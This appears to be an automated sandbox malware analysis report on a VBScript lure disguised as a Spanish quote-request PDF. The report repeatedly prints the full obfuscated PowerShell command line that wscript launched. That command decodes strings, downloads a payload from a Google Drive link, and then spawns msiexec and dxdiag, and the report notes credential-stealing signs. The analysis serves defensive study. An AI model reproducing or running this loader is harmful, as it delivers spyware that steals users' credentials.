                Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B0000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1782637511.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B0000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1782637511.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.7:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.7:49708 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: amsi32_7644.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7364, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7644, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fog
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$FogJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC3AB2768_2_00007FFAAC3AB276
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC3AC0228_2_00007FFAAC3AC022
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC47A09A8_2_00007FFAAC47A09A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_048AF34011_2_048AF340
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_048AFC1011_2_048AFC10
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_048AEFF811_2_048AEFF8
                Source: Solicitud de presupuesto 09-30-2024#U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7088
                Source: unknownProcess created: Commandline size = 7088
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7088Jump to behavior
                Source: amsi32_7644.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7364, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7644, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@30/10@2/3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Tallowweed.KliJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbnz1vi2.yk0.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7364
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7644
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: dxdiag.exe, 00000019.00000003.1816068285.0000000022EB5000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Solicitud de presupuesto 09-30-2024#U00b7pdf.vbsVirustotal: Detection: 9%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fog
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fog
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$FogJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
